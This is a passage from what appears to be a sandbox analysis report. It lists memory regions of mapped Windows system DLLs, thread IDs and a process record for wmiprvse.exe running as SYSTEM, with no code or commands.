0x7ffda7c3ffff monitored = 0 entry_point = 0x7ffda7c356e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2714 start_va = 0x7ffda7c40000 end_va = 0x7ffda7cc5fff monitored = 0 entry_point = 0x7ffda7c4d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2715 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2716 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2717 start_va = 0x7ffda7f30000 end_va = 0x7ffda80f6fff monitored = 0 entry_point = 0x7ffda7f8db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2718 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2719 start_va = 0x7ffda8150000 end_va = 0x7ffda81a4fff monitored = 0 entry_point = 0x7ffda8167970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2720 start_va = 0x7ffda8260000 end_va = 0x7ffda8314fff monitored = 0 entry_point = 0x7ffda82a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2721 start_va = 0x7ffda8320000 end_va = 0x7ffda8963fff monitored = 0 entry_point = 0x7ffda84e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2722 start_va = 0x7ffda8970000 end_va = 0x7ffda8986fff monitored = 0 entry_point = 0x7ffda8971390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2723 start_va = 0x7ffda8990000 end_va = 0x7ffda89ebfff monitored = 0 entry_point = 0x7ffda89ab720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2724 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2725 start_va = 0x7ffda8ae0000 end_va = 0x7ffda8b86fff monitored = 0 entry_point = 0x7ffda8aeb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2726 start_va = 0x7ffda8b90000 end_va = 0x7ffda8b97fff monitored = 0 entry_point = 0x7ffda8b91ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2727 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2728 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2729 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2730 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2731 start_va = 0x7ffda9280000 end_va = 0x7ffda96a8fff monitored = 0 entry_point = 0x7ffda92a8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2732 start_va = 0x7ffda96b0000 end_va = 0x7ffda97f2fff monitored = 0 entry_point = 0x7ffda96d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2733 start_va = 0x7ffda9800000 end_va = 0x7ffda986afff monitored = 0 entry_point = 0x7ffda98190c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2734 start_va = 0x7ffda9870000 end_va = 0x7ffdaadcefff monitored = 0 entry_point = 0x7ffda99d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2735 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2736 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2737 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2738 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2739 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2740 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2744 start_va = 0x8520000 end_va = 0x861ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008520000" filename = "" Region: id = 2745 start_va = 0x8620000 end_va = 0x871ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008620000" filename = "" Region: id = 2746 start_va = 0x8720000 end_va = 0x881ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 2747 start_va = 0x8820000 end_va = 0x891ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008820000" filename = "" Region: id = 2748 start_va = 0x8920000 end_va = 0x8a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008920000" filename = "" Region: id = 2749 start_va = 0x8a20000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 2824 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 2825 start_va = 0x130000 end_va = 0x132fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2850 start_va = 0x130000 end_va = 0x137fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2854 start_va = 0x130000 end_va = 0x135fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3298 start_va = 0x130000 end_va = 0x132fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3300 start_va = 0x130000 end_va = 0x132fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3302 start_va = 0x130000 end_va = 0x132fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3442 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3648 start_va = 0x130000 end_va = 0x131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3685 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Thread: id = 15 os_tid = 0xc04 Thread: id = 16 os_tid = 0x924 Thread: id = 17 os_tid = 0x874 Thread: id = 18 os_tid = 0x11f0 Thread: id = 19 os_tid = 0x11e8 Thread: id = 20 os_tid = 0x11e0 Thread: id = 21 os_tid = 0x11d0 Thread: id = 22 os_tid = 0x11cc Thread: id = 23 os_tid = 0x1074 Thread: id = 24 os_tid = 0x3c0 Thread: id = 25 os_tid = 0xfb4 Thread: id = 26 os_tid = 0xfa8 Thread: id = 27 os_tid = 0xfa4 Thread: id = 28 os_tid = 0xfa0 Thread: id = 29 os_tid = 0xf98 Thread: id = 30 os_tid = 0xf90 Thread: id = 31 os_tid = 0xf88 Thread: id = 32 os_tid = 0x8e0 Thread: id = 33 os_tid = 0xf10 Thread: id = 34 os_tid = 0x99c Thread: id = 35 os_tid = 0x380 Thread: id = 36 os_tid = 0x378 Thread: id = 37 os_tid = 0x340 Thread: id = 38 os_tid = 0x280 Thread: id = 39 os_tid = 0x2ec Thread: id = 40 os_tid = 0x164 Thread: id = 41 os_tid = 0xe80 Thread: id = 42 os_tid = 0x338 Thread: id = 43 os_tid = 0x904 Thread: id = 44 os_tid = 0xeb4 Thread: id = 45 os_tid = 0xeac Thread: id = 46 os_tid = 0xea4 Thread: id = 47 os_tid = 0xe04 Thread: id = 48 os_tid = 0xd14 Thread: id = 49 os_tid = 0xe60 Thread: id = 50 os_tid = 0xe6c Thread: id = 51 os_tid = 0xc28 Thread: id = 52 os_tid = 0x6b8 Thread: id = 53 os_tid = 0xb24 Thread: id = 54 os_tid = 0xa8c Thread: id = 55 os_tid = 0xd7c Thread: id = 56 os_tid = 0xd6c Thread: id = 57 os_tid = 0x89c Thread: id = 58 os_tid = 0xff0 Thread: id = 59 os_tid = 0xcac Thread: id = 60 os_tid = 0x6c4 Thread: id = 61 os_tid = 0x8ac Thread: id = 62 os_tid = 0x8a4 Thread: id = 63 os_tid = 0x8a0 Thread: id = 64 os_tid = 0x878 Thread: id = 65 os_tid = 0x860 Thread: id = 66 os_tid = 0x858 Thread: id = 67 os_tid = 0x854 Thread: id = 68 os_tid = 0x840 Thread: id = 69 os_tid = 0x834 Thread: id = 70 os_tid = 0x814 Thread: id = 71 os_tid = 0x500 Thread: id = 72 os_tid = 0x554 Thread: id = 73 os_tid = 0x4f4 Thread: id = 74 os_tid = 0x520 Thread: id = 75 os_tid = 0x524 Thread: id = 76 os_tid = 0x460 Thread: id = 77 os_tid = 0x574 Thread: id = 78 os_tid = 0x4e8 Thread: id = 79 os_tid = 0x760 Thread: id = 80 os_tid = 0x718 Thread: id = 81 os_tid = 0x6c0 Thread: id = 82 os_tid = 0x694 Thread: id = 83 os_tid = 0x618 Thread: id = 84 os_tid = 0x608 Thread: id = 85 os_tid = 0x59c Thread: id = 86 os_tid = 0x4fc Thread: id = 87 os_tid = 0x4bc Thread: id = 88 os_tid = 0x4a8 Thread: id = 89 os_tid = 0x478 Thread: id = 90 os_tid = 0x41c Thread: id = 91 os_tid = 0x2e4 Thread: id = 92 os_tid = 0x3b4 Thread: id = 93 os_tid = 0x8 Thread: id = 94 os_tid = 0x2f0 Thread: id = 95 os_tid = 0x308 Thread: id = 96 os_tid = 0x270 Thread: id = 97 os_tid = 0x210 Thread: id = 98 os_tid = 0x18c Thread: id = 99 os_tid = 0x140 Thread: id = 100 os_tid = 0x3f4 Thread: id = 101 os_tid = 0x3ec Thread: id = 102 os_tid = 0x3e4 Thread: id = 103 os_tid = 0x368 Thread: id = 120 os_tid = 0x8e4 Thread: id = 121 os_tid = 0x714 Thread: id = 122 os_tid = 0x9ac Thread: id = 123 os_tid = 0xb04 Thread: id = 124 os_tid = 0x8f0 Thread: id = 125 os_tid = 0xbf0 Thread: id = 126 os_tid = 0xf78 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x601b8000" os_pid = "0x7bc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xe], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac37" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2964 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2965 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2966 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2967 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2968 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2969 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2970 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2971 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2972 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2973 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2974 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2975 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2976 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2977 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2978 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 2979 start_va = 0x550000 end_va = 0x554fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2980 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2981 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2982 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2983 start_va = 0x6f0000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2984 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 2985 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 2986 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 2987 start_va = 0x8d0000 end_va = 0xc06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2988 start_va = 0xc10000 end_va = 0xd90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 2989 start_va = 0xda0000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 2990 start_va = 0xea0000 end_va = 0xf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 2991 start_va = 0xf20000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 2992 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2993 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 2994 start_va = 0x1120000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 2995 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2996 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2997 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2998 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2999 start_va = 0x7ff61e550000 end_va = 0x7ff61e5cffff monitored = 0 entry_point = 0x7ff61e565f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3000 start_va = 0x7ffd90430000 end_va = 0x7ffd9047cfff monitored = 0 entry_point = 0x7ffd9043b470 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 3001 start_va = 0x7ffd96c60000 end_va = 0x7ffd96c9cfff monitored = 1 entry_point = 0x7ffd96c6b760 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 3002 start_va = 0x7ffd97150000 end_va = 0x7ffd97165fff monitored = 0 entry_point = 0x7ffd971555e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3003 start_va = 0x7ffd972c0000 end_va = 0x7ffd972e4fff monitored = 0 entry_point = 0x7ffd972c9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3004 start_va = 0x7ffd972f0000 end_va = 0x7ffd97303fff monitored = 0 entry_point = 0x7ffd972f1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3005 start_va = 0x7ffd97350000 end_va = 0x7ffd97445fff monitored = 0 entry_point = 0x7ffd97389590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3006 start_va = 0x7ffd97630000 end_va = 0x7ffd97640fff monitored = 0 entry_point = 0x7ffd97632fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3007 start_va = 0x7ffd9b340000 end_va = 0x7ffd9b3befff monitored = 1 entry_point = 0x7ffd9b357110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3008 start_va = 0x7ffd9f2d0000 end_va = 0x7ffd9f2f4fff monitored = 1 entry_point = 0x7ffd9f2e5dc0 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 3009 start_va = 0x7ffda1ea0000 end_va = 0x7ffda1eb0fff monitored = 0 entry_point = 0x7ffda1ea3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 3010 start_va = 0x7ffda40c0000 end_va = 0x7ffda4123fff monitored = 0 entry_point = 0x7ffda40d5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3011 start_va = 0x7ffda70a0000 end_va = 0x7ffda70d0fff monitored = 0 entry_point = 0x7ffda70a7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3012 start_va = 0x7ffda7a40000 end_va = 0x7ffda7a68fff monitored = 0 entry_point = 0x7ffda7a54530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3013 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3014 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3015 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3016 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3017 start_va = 0x7ffda8ae0000 end_va = 0x7ffda8b86fff monitored = 0 entry_point = 0x7ffda8aeb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3018 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3019 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3020 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3021 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3022 start_va = 0x7ffda9800000 end_va = 0x7ffda986afff monitored = 0 entry_point = 0x7ffda98190c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3023 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3024 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3025 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3026 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3027 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 104 os_tid = 0x980 Thread: id = 105 os_tid = 0xfe4 Thread: id = 106 os_tid = 0xd60 [0274.483] DllCanUnloadNow () returned 